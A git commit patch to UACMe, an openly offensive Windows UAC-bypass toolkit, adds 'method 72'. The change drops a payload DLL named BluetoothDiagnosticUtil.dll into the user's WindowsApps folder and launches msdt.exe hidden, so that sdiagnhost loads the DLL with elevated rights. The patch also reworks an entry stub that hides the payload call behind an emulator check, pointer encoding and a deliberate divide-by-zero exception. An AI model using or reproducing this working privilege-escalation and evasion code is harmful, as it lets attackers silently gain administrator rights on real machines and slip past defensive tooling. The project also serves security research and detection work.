From aed877814449c058eefa5c8a292de1bdc6bcb5f2 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Fri, 4 Feb 2022 22:14:05 +0700 Subject: [PATCH] v 3.5.9 Method 72 added Release candidate 1 --- LICENSE.md | 2 +- README.md | 13 ++++- Source/Akagi/bin64res.h | Bin 212 -> 264 bytes Source/Akagi/bin64res.rc | 1 + Source/Akagi/global.h | 16 +++++- Source/Akagi/main.c | 13 ++--- Source/Akagi/methods/hybrids.c | 99 +++++++++++++++++++++++++++++++- Source/Akagi/methods/hybrids.h | 10 +++- Source/Akagi/methods/methods.c | 17 ++++-- Source/Akagi/methods/methods.h | 7 ++- Source/Akagi/stub.c | 91 ++++++++++++++--------------- Source/Akagi/stub.h | 8 +-- Source/Akagi/uacme.vcxproj | 2 +- Source/Akagi/uacme.vcxproj.user | 5 +- Source/Akatsuki/version.rc | Bin 4602 -> 4602 bytes Source/Fubuki/version.rc | Bin 4582 -> 4582 bytes Source/Naka/main.c | 11 +++- Source/Shared/consts.h | 10 ++-- UACME.sha256 | 32 +++++------ 19 files changed, 231 insertions(+), 106 deletions(-) diff --git a/LICENSE.md b/LICENSE.md index 2d5e513a..6fcf3e74 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,4 +1,4 @@ -Copyright (c) 2014 - 2021, UACMe authors +Copyright (c) 2014 - 2022, UACMe authors Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: diff --git a/README.md b/README.md index 946f7220..61850e13 100644 --- a/README.md +++ b/README.md @@ -733,6 +733,16 @@ First parameter is number of method to use, second is optional command (executab * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.5.8 +72. Author: Emeric Nasi + * Type: Dll Hijack + * Method: Dll path search abuse + * Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe + * Component(s): BluetoothDiagnosticUtil.dll + * Implementation: ucmMsdtMethod + * Works from: Windows 10 (10240) + * Fixed in: unfixed :see_no_evil: + * How: - + * Code status: added in v3.5.9 @@ -835,9 +845,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105 * UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html * UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html * Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses +* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass # Authors -(c) 2014 - 2021 UACMe Project +(c) 2014 - 2022 UACMe Project [![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com) diff --git a/Source/Akagi/bin64res.h b/Source/Akagi/bin64res.h index 6e7736b29717197fff98129abf68e2a352e02e79..32483e9e99c7f394e00dddb20e619e7dce91603f 100644 GIT binary patch delta 23 fcmcb@*ugYm*F-5Ec4G!31_cJAiMomtcS!*NQR@a{ delta 9 QcmeBRy23bN*Ti>H02CAiLjV8( diff --git a/Source/Akagi/bin64res.rc b/Source/Akagi/bin64res.rc index 0590085b..c2deb14d 100644 --- a/Source/Akagi/bin64res.rc +++ b/Source/Akagi/bin64res.rc @@ -2,6 +2,7 @@ #include "winres.h" LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US IDR_FUBUKI64 RCDATA "bin\\fubuki64.cd" +IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd" IDR_AKATSUKI64 RCDATA "bin\\akatsuki64.cd" IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd" IDR_SECRETS RCDATA "bin\\secrets64.bin" diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h index 2c57dac5..281662fa 100644 --- a/Source/Akagi/global.h +++ b/Source/Akagi/global.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2021 +* (C) COPYRIGHT AUTHORS, 2014 - 2022 * * TITLE: GLOBAL.H * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 01 Dec 2021 +* DATE: 04 Feb 2022 * * Common header file for the program support routines. * @@ -45,11 +45,13 @@ #include "bin64res.h" #define FUBUKI_ID IDR_FUBUKI64 #define AKATSUKI_ID IDR_AKATSUKI64 +#define FUBUKI32_ID IDR_FUBUKI32 #define KAMIKAZE_ID IDR_KAMIKAZE #else #include "bin32res.h" #define FUBUKI_ID IDR_FUBUKI32 #define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit +#define FUBUKI32_ID IDR_FUBUKI32 #define KAMIKAZE_ID IDR_KAMIKAZE #endif @@ -149,5 +151,13 @@ typedef UINT(WINAPI *pfnEntryPoint)( _In_ BOOL OutputToDebugger ); +typedef struct _UACME_THREAD_CONTEXT { + TEB_ACTIVE_FRAME Frame; + pfnEntryPoint ucmMain; + DWORD ReturnedResult; + ULONG OptionalParameterLength; + LPWSTR OptionalParameter; +} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT; + extern PUACMECONTEXT g_ctx; extern HINSTANCE g_hInstance; diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c index 417d54a6..0678c199 100644 --- a/Source/Akagi/main.c +++ b/Source/Akagi/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2021 +* (C) COPYRIGHT AUTHORS, 2014 - 2022 * * TITLE: MAIN.C * -* VERSION: 3.57 +* VERSION: 3.59 * -* DATE: 01 Nov 2021 +* DATE: 02 Feb 2022 * * Program entry point. * @@ -217,10 +217,5 @@ NTSTATUS WINAPI ucmMain( #pragma comment(linker, "/ENTRY:main") VOID __cdecl main() { -#ifdef _WIN64 - __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain); -#else - __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain); -#endif - ExitProcess(StubInit()); + ExitProcess(StubInit(ucmMain)); } diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c index 3908f441..86d924df 100644 --- a/Source/Akagi/methods/hybrids.c +++ b/Source/Akagi/methods/hybrids.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2021 +* (C) COPYRIGHT AUTHORS, 2015 - 2022 * * TITLE: HYBRIDS.C * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 01 Dec 2021 +* DATE: 02 Feb 2022 * * Hybrid UAC bypass methods. * @@ -1045,3 +1045,96 @@ NTSTATUS ucmJunctionMethod( return MethodResult; } + +/* +* ucmMsdtMethod +* +* Purpose: +* +* Bypass UAC by dll hijack of sdiagnhost. +* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass +* +*/ +NTSTATUS ucmMsdtMethod( + _In_ PVOID ProxyDll, + _In_ DWORD ProxyDllSize +) +{ + BOOLEAN bCleanupNeeded = FALSE; + UINT i; + NTSTATUS MethodResult = STATUS_ACCESS_DENIED; +#ifndef _WIN64 + NTSTATUS ntStatus = STATUS_ACCESS_DENIED; +#endif + WCHAR szPath[MAX_PATH * 2]; + WCHAR szApp[MAX_PATH + 1]; + WCHAR szParams[MAX_PATH * 2]; + +#ifndef _WIN64 + if (g_ctx->IsWow64) { + ntStatus = supEnableDisableWow64Redirection(TRUE); + if (!NT_SUCCESS(ntStatus)) + return ntStatus; + } +#endif + + do { + + RtlSecureZeroMemory(&szPath, sizeof(szPath)); + if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE)) + break; + + supConcatenatePaths(szPath, TEXT("Microsoft\\WindowsApps"), MAX_PATH); + supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH); + + if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize)) + break; + + bCleanupNeeded = TRUE; + + _strcpy(szApp, g_ctx->szSystemRoot); + supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH); + supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH); + + _strcpy(szParams, TEXT("-path ")); + _strcat(szParams, g_ctx->szSystemRoot); + _strcat(szParams, TEXT("diagnostics\\index\\BluetoothDiagnostic.xml -skip yes")); + + if (supRunProcess2(szApp, + szParams, + NULL, + SW_HIDE, + 10000)) + { + MethodResult = STATUS_SUCCESS; + } + + } while (FALSE); + + + if (bCleanupNeeded) { + i = 5; + do { + + if (DeleteFile(szPath)) + break; + + Sleep(1000); + i--; + } while (i); + + } + + +#ifndef _WIN64 + if (g_ctx->IsWow64) { + supEnableDisableWow64Redirection(FALSE); + } +#endif + +#ifdef _DEBUG + supSetGlobalCompletionEvent(); +#endif + + return MethodResult; +} diff --git a/Source/Akagi/methods/hybrids.h b/Source/Akagi/methods/hybrids.h index 98358ba4..a7c3fd37 100644 --- a/Source/Akagi/methods/hybrids.h +++ b/Source/Akagi/methods/hybrids.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2021 +* (C) COPYRIGHT AUTHORS, 2015 - 2022 * * TITLE: HYBRIDS.H * -* VERSION: 3.57 +* VERSION: 3.59 * -* DATE: 01 Nov 2020 +* DATE: 02 Feb 2022 * * Prototypes and definitions for hybrid methods. * @@ -53,6 +53,10 @@ NTSTATUS ucmJunctionMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); +NTSTATUS ucmMsdtMethod( + _In_ PVOID ProxyDll, + _In_ DWORD ProxyDllSize); + // // Post execution cleanup routines. // diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c index 79792689..bd32d50b 100644 --- a/Source/Akagi/methods/methods.c +++ b/Source/Akagi/methods/methods.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2021 +* (C) COPYRIGHT AUTHORS, 2015 - 2022 * * TITLE: METHODS.C * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 01 Dec 2021 +* DATE: 04 Feb 2022 * * UAC bypass dispatch. * @@ -45,6 +45,7 @@ UCM_API(MethodFwCplLua2); UCM_API(MethodProtocolHijack); UCM_API(MethodPca); UCM_API(MethodCurVer); +UCM_API(MethodMsdt); ULONG UCM_WIN32_NOT_IMPLEMENTED[] = { UacMethodWow64Logger, @@ -131,7 +132,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, - { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE } + { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, + { MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE } }; /* @@ -746,3 +748,10 @@ UCM_API(MethodCurVer) #endif } + +UCM_API(MethodMsdt) +{ + return ucmMsdtMethod( + Parameter->PayloadCode, + Parameter->PayloadSize); +} diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h index 785d0521..5dd16e57 100644 --- a/Source/Akagi/methods/methods.h +++ b/Source/Akagi/methods/methods.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2021 +* (C) COPYRIGHT AUTHORS, 2014 - 2022 * * TITLE: METHODS.H * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 21 Nov 2021 +* DATE: 04 Feb 2022 * * Prototypes and definitions for UAC bypass methods table. * @@ -91,6 +91,7 @@ typedef enum _UCM_METHOD { UacMethodPca, //+ UacMethodCurVer, //+ UacMethodNICPoison2, //+ + UacMethodMsdt, //+ UacMethodMax, UacMethodInvalid = 0xabcdef } UCM_METHOD; diff --git a/Source/Akagi/stub.c b/Source/Akagi/stub.c index 5aa9fcad..3d757a4a 100644 --- a/Source/Akagi/stub.c +++ b/Source/Akagi/stub.c @@ -1,12 +1,12 @@ -/******************************************************************************* +/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2018 - 2022 * * TITLE: STUB.C * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 28 Jan 2022 +* DATE: 02 Feb 2022 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -16,7 +16,7 @@ *******************************************************************************/ #include "global.h" -UINT ucmExitCode = (UINT)STATUS_ACCESS_DENIED; +TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "(^/\\^)" }; /* * ucmSehHandler @@ -31,66 +31,59 @@ INT ucmSehHandler( _In_ EXCEPTION_POINTERS* ExceptionInfo ) { - DWORD_PTR entry; - NTSTATUS result = wdIsEmulatorPresent(); + UACME_THREAD_CONTEXT* uctx; UNREFERENCED_PARAMETER(ExceptionInfo); if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) { + uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame(); + while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) { + uctx = (UACME_THREAD_CONTEXT*)uctx->Frame.Previous; + } + if (uctx) { + if (uctx->ucmMain) { + uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain); -#ifdef _WIN64 - entry = (DWORD_PTR)__readgsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer)); - __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), 0); - entry = (RotateRight64( - (ULONG_PTR)(ULONG_PTR)entry, - 0x40 - (result & 0x3f)) ^ result); -#else - entry = (DWORD_PTR)__readfsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer)); - __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), 0); - entry = (RotateRight32( - (ULONG_PTR)entry, - 0x20 - (result & 0x1f)) ^ result); -#endif - - ucmExitCode = ((pfnEntryPoint)(entry))(UacMethodInvalid, - NULL, - 0, - FALSE); - + uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid, + NULL, + 0, + FALSE); + } + } return EXCEPTION_EXECUTE_HANDLER; } return EXCEPTION_CONTINUE_SEARCH; } -DWORD StubInit(VOID) +DWORD StubInit( + _In_ PVOID EntryPoint) { int v = 1, d = 0; - DWORD_PTR entry; - NTSTATUS ntStatus = STATUS_NOT_SUPPORTED; + UACME_THREAD_CONTEXT uctx; - __try { + RtlSecureZeroMemory(&uctx, sizeof(uctx)); -#ifdef _WIN64 - entry = (DWORD_PTR)__readgsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer)); - entry = (RotateRight64( - (ULONG_PTR)entry ^ ntStatus, - ntStatus & 0x3f)); - __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), entry); -#else - entry = (DWORD_PTR)__readfsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer)); - entry = (RotateRight32( - (ULONG_PTR)entry ^ ntStatus, - ntStatus & 0x1f)); - __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), entry); -#endif + if (wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) { - v = (int)USER_SHARED_DATA->NtProductType; - d = (int)USER_SHARED_DATA->AlternativeArchitecture; - v = (int)(v / d); - } - __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) { - v = ucmExitCode; + uctx.Frame.Context = &g_fctx; + + uctx.ucmMain = (pfnEntryPoint)supEncodePointer(EntryPoint); + RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx); + + __try { + v = (int)USER_SHARED_DATA->NtProductType; + d = (int)USER_SHARED_DATA->AlternativeArchitecture; + v = (int)(v / d); + } + __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) { + v = 1; + } + + RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx); } - return ucmExitCode; + if (v) + return uctx.ReturnedResult; + else + return (DWORD)STATUS_ACCESS_DENIED; } diff --git a/Source/Akagi/stub.h b/Source/Akagi/stub.h index e0d0b81b..5978aea9 100644 --- a/Source/Akagi/stub.h +++ b/Source/Akagi/stub.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2018 - 2021 +* (C) COPYRIGHT AUTHORS, 2018 - 2022 * * TITLE: STUB.H * -* VERSION: 3.57 +* VERSION: 3.59 * -* DATE: 01 Nov 2021 +* DATE: 02 Feb 2022 * * Kuma stub header file * @@ -18,4 +18,4 @@ *******************************************************************************/ #pragma once -DWORD StubInit(VOID); +DWORD StubInit(_In_ PVOID EntryPoint); diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj index f3ad5b26..70e1217f 100644 --- a/Source/Akagi/uacme.vcxproj +++ b/Source/Akagi/uacme.vcxproj @@ -362,7 +362,6 @@ Windows - false true true @@ -372,6 +371,7 @@ 6.1 + false diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user index 067c18d7..4fdce088 100644 --- a/Source/Akagi/uacme.vcxproj.user +++ b/Source/Akagi/uacme.vcxproj.user @@ -16,7 +16,7 @@ WindowsLocalDebugger - 71 + 72 WindowsLocalDebugger @@ -24,7 +24,8 @@ WindowsLocalDebugger - 32 + + WindowsLocalDebugger \ No newline at end of file diff --git a/Source/Akatsuki/version.rc b/Source/Akatsuki/version.rc index ee02fd460dc04c6f24833eb7953ba82b3cfbd9ef..e47a7a879c94fa49d1dc63c3fb1fd43d5d78afef 100644 GIT binary patch delta 76 zcmeyR{7ZSmBo0nX1|0??AT*dfn?s))&SNl|EYB&q`5ngvCZG~MsFL%%lA9lJKVw7) KZ9dPd%>n?@=n_N# delta 76 zcmeyR{7ZSmBo0ms1|0??215qJ$+J21x#2tpqsj7|lAGUgTwnq!(Ss^E&nvn40rxXT LgwW>myxJ@P(l-)7 diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc index 13e8ef3a693a1774ea9a7a080c9febb3538f2905..16336e8328cef20765c60e45fc2aa5def0661204 100644 GIT binary patch delta 76 zcmaE+{7iYnBo0nX1|0??AT*dfn?s))&SNl|EYB&q`5nh0CZG~MsFK%Q`kP;HpJGG^ KZQjkR%>n?&v=S8n delta 76 zcmaE+{7iYnBo0ms1|0??215qJ$+J21x#2tpqsj7|lAGUg9AW}0(Ss^^&85Hj1@|dN LgwW>QyxJ@P#{&`( diff --git a/Source/Naka/main.c b/Source/Naka/main.c index 8f0105d3..a6bc6bb5 100644 --- a/Source/Naka/main.c +++ b/Source/Naka/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 - 2020 +* (C) COPYRIGHT AUTHORS, 2016 - 2022 * * TITLE: MAIN.C * -* VERSION: 3.50 +* VERSION: 3.59 * -* DATE: 14 Sep 2020 +* DATE: 02 Feb 2022 * * Naka, support payload compressor. * @@ -1121,6 +1121,11 @@ VOID CreateSecretTables(VOID) if (ProcessUnit(szFileName, IDR_FUBUKI64, &S[c])) c++; + szFileName[l] = 0; + _strcat(&szFileName[l], L"Fubuki32.key"); + if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c])) + c++; + szFileName[l] = 0; _strcat(&szFileName[l], L"Kamikaze.key"); if (ProcessUnit(szFileName, IDR_KAMIKAZE64, &S[c])) diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h index d08856d4..ba31eed2 100644 --- a/Source/Shared/consts.h +++ b/Source/Shared/consts.h @@ -4,9 +4,9 @@ * * TITLE: CONSTS.H * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 28 Jan 2022 +* DATE: 04 Feb 2022 * * Global consts definition file. * @@ -47,8 +47,8 @@ #define UCM_VERSION_MAJOR 3 #define UCM_VERSION_MINOR 5 -#define UCM_VERSION_REVISION 8 -#define UCM_VERSION_BUILD 2201 +#define UCM_VERSION_REVISION 9 +#define UCM_VERSION_BUILD 2202 #define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000 @@ -147,6 +147,7 @@ // #define APISET_KERNEL32LEGACY L"api-ms-win-core-kernel32-legacy-l1.DLL" +#define BLUETOOTHDIAGNOSTICUTIL_DLL L"BluetoothDiagnosticUtil.dll" #define COMCTL32_DLL L"comctl32.dll" #define DISMCORE_DLL L"dismcore.dll" #define DUSER_DLL L"duser.dll" @@ -180,6 +181,7 @@ #define MMC_EXE L"mmc.exe" #define MSCONFIG_EXE L"msconfig.exe" #define MSCHEDEXE_EXE L"mschedexe.exe" +#define MSDT_EXE L"msdt.exe" #define OSK_EXE L"osk.exe" #define PKGMGR_EXE L"pkgmgr.exe" #define SDCLT_EXE L"sdclt.exe" diff --git a/UACME.sha256 b/UACME.sha256 index afa90541..a83f8945 100644 --- a/UACME.sha256 +++ b/UACME.sha256 @@ -7,26 +7,26 @@ b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397 *Source\Akagi\a 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest 9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25 *Source\Akagi\bin32res.h 3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c *Source\Akagi\bin32res.rc -8977786129c9d6d526fb2e41fb3a3ab25566ee53b60db658a41f75d6f58f4e90 *Source\Akagi\bin64res.h -f7e3861fc30e750c9a65fc338a9ad72a8d7a31ee949aef37cfe98a15b60a9ba2 *Source\Akagi\bin64res.rc +e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a *Source\Akagi\bin64res.h +5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a *Source\Akagi\bin64res.rc bc0e6067d038a528fdfc90793b199ae73f211da7df33341bfd7bcfce2c163eb7 *Source\Akagi\compress.c 5a46c82638d48aaea2edfed0e8c50981dd606be8e3c171f8608f51bc777305cf *Source\Akagi\compress.h d3b0fdac91acd95076de2a1d037c05692712e92ef8f77fd1f8a1db1579ee2923 *Source\Akagi\encresource.h f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788 *Source\Akagi\fusutil.c eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b *Source\Akagi\fusutil.h -d1acbe26c56a6c0b8db84dad2506dd50e84a8842b4f002b81ff9114d9531e8ba *Source\Akagi\global.h -3a00394eb92d3bcbadad8a6313cd6d3ad5061901e80391450efcfe5e9bf8dc1e *Source\Akagi\main.c +e0e97bec016ef156dad00c4986ed620584663a68823e9e8656239d595b915585 *Source\Akagi\global.h +06c1b9b39448d4fd789856f51742c9346917080ca86a2f9b110c30c22d108c4b *Source\Akagi\main.c 9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58 *Source\Akagi\makecab.c bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h 10a31b41ae931835100b1a7537be6fdaec2a306b71110fa9656f9bf5f4a6a76b *Source\Akagi\Resource.rc -002992a366199b4bb180850bede26fd8602be8b36d37d93da6e3778460345fef *Source\Akagi\stub.c -d951a09c7011fa1aa3854ea713836c9cd63aa88ac9f64f013d2f24f9fcaa9b38 *Source\Akagi\stub.h +a808ad08347f68f18ddc75eed8e284e8479da7970af5b17a169fa972b8512d9a *Source\Akagi\stub.c +b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06 *Source\Akagi\stub.h 273c6105759779913664cd813232a69382562ff1818756cc689a45b1fd11a902 *Source\Akagi\sup.c 912447a3eb73b10278c965fd9273b4eb75902c41681e76e9a547b57af1e1617a *Source\Akagi\sup.h -f245bd85599293b3c6bc294a01f160393e28703e98dc772ebd8b13d189897055 *Source\Akagi\uacme.vcxproj +ee447f9ad4b2cccb615f8d530048a349243afdafbe9314637115cdd60b1684bd *Source\Akagi\uacme.vcxproj 15a18a8f06b4ce02de316a0b4a6b7a3cb41d6353711d3e2429164622c47e44ab *Source\Akagi\uacme.vcxproj.filters -3779b8e127c260dd6f7bd4b84665465b3e09af811f8c90d6eef10a07d4395de3 *Source\Akagi\uacme.vcxproj.user +f04df8b72d7d5fe30795e4cac6ec1268d1f955150303e366a91ac8f7ba6135be *Source\Akagi\uacme.vcxproj.user fd2bf3f4369850efc4c408133ddf253ced6f0b400b13997060c50a2f9b6cc9d0 *Source\Akagi\uas.h 750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6 *Source\Akagi\appinfo\appinfo.acf 2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5 *Source\Akagi\appinfo\appinfo.idl @@ -51,10 +51,10 @@ e7654ba3099afcc9183d3d092e9cbe19ea06faddbbfb554891eeece174d81b8e *Source\Akagi\m cf5152c786b5e72514038a256e0372c176ac20ca49653bbf80a0862963bf3c20 *Source\Akagi\methods\elvint.h 8453310f284faee89d5b5e575d1521dd6dd7983bc9cd67e204a51676d9511916 *Source\Akagi\methods\hakril.c e72fce9d89c7ac424e90635dc984a943890c8422c2a6869c49c3a29accde6521 *Source\Akagi\methods\hakril.h -49e14cdf2c470d50272980c46f15ef7b3ffad41e78de8d6f9cf9c3ee3db09b47 *Source\Akagi\methods\hybrids.c -90aa9cbbbbe621a7215083fbfcd52bfc64df261a6dc795fb719a21a61db0fc9a *Source\Akagi\methods\hybrids.h -1b793c9da6cf4755070ff6bec59bd1affc5e07d87b968ba211cb14b12916c9c4 *Source\Akagi\methods\methods.c -ad157a213ace932adaf09559f91c600588c25a86801d7f1dda04f5973ed6b45d *Source\Akagi\methods\methods.h +1edcbc82ed2f214b03f22305736179b6777a9bab755138b52ab5ae6e9dbf7b0a *Source\Akagi\methods\hybrids.c +112da2d5701041e58b1b01a8d5a42854200b171ec8c8b4712f957f63877e16b6 *Source\Akagi\methods\hybrids.h +a3d618693fc6780e5c1e8d04f3f8e8edb7d64ea77f635e20dbaff64118859585 *Source\Akagi\methods\methods.c +9302023437c9a80e2d8910f6e9ffa24ece680278653ebef6247acfc1e21e64a6 *Source\Akagi\methods\methods.h f220dbc1bb1e525e3adb76f0d1e9ac3237851bcbb55e7fd350288ef492116756 *Source\Akagi\methods\rinn.c 244cba3a74291e324964cfb40c153a00426b0e1f2fcb3f02ac7063e9915e52d8 *Source\Akagi\methods\rinn.h c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63 *Source\Akagi\methods\shellsup.c @@ -83,7 +83,7 @@ beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3 *Source\Akagi\p a65a782ee8e6ace52ce6e51a64220618ca6057cd0de9c306301ef7db6ce4473d *Source\Akatsuki\dllmain.c e10acf379efd906f8bf06a28e3b0b5598618c109c8a30f43e831b42f6aaf1950 *Source\Akatsuki\export.def 4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h -b506b75f27c926e96400505f1c4dba6309b81283eac4bd38d7ee54c0e4aa43c6 *Source\Akatsuki\version.rc +4be964507603af178e31d7cbdb373e4bd6cc8c405be07e94f3f0d1217047515a *Source\Akatsuki\version.rc ed9e60aeb6f2426647cafd1c1a495d19735a977537d4ab188736f2f4dac5b5d4 *Source\Fubuki\dll.vcxproj 119a274dc329b1d3bc94ee836fc7a18612faa26a517ad04fc3f95cc548f2b1a1 *Source\Fubuki\dll.vcxproj.filters f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7 *Source\Fubuki\dll.vcxproj.user @@ -95,18 +95,18 @@ bbc77818711a5f5152b99ca50cb018575ce05ff59859c45eb4bb7353d86daca8 *Source\Fubuki\ 4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h 4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a *Source\Fubuki\uihacks.c 73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9 *Source\Fubuki\uihacks.h -ebceab69aab14e266650ff14dde76f5c0e65e38779ed868b76c3960310a2a8f7 *Source\Fubuki\version.rc +c8baef1a5f32ab37d3883d18fd9d9ddfa6a0729472960892eecf2e8d149ab167 *Source\Fubuki\version.rc b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25 *Source\Kamikaze\Kamikaze.msc d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744 *Source\Kamikaze\Launcher.html -f5e85b52a96d196e4131f145357153f74318f612657025f311832573f1404c9a *Source\Naka\main.c 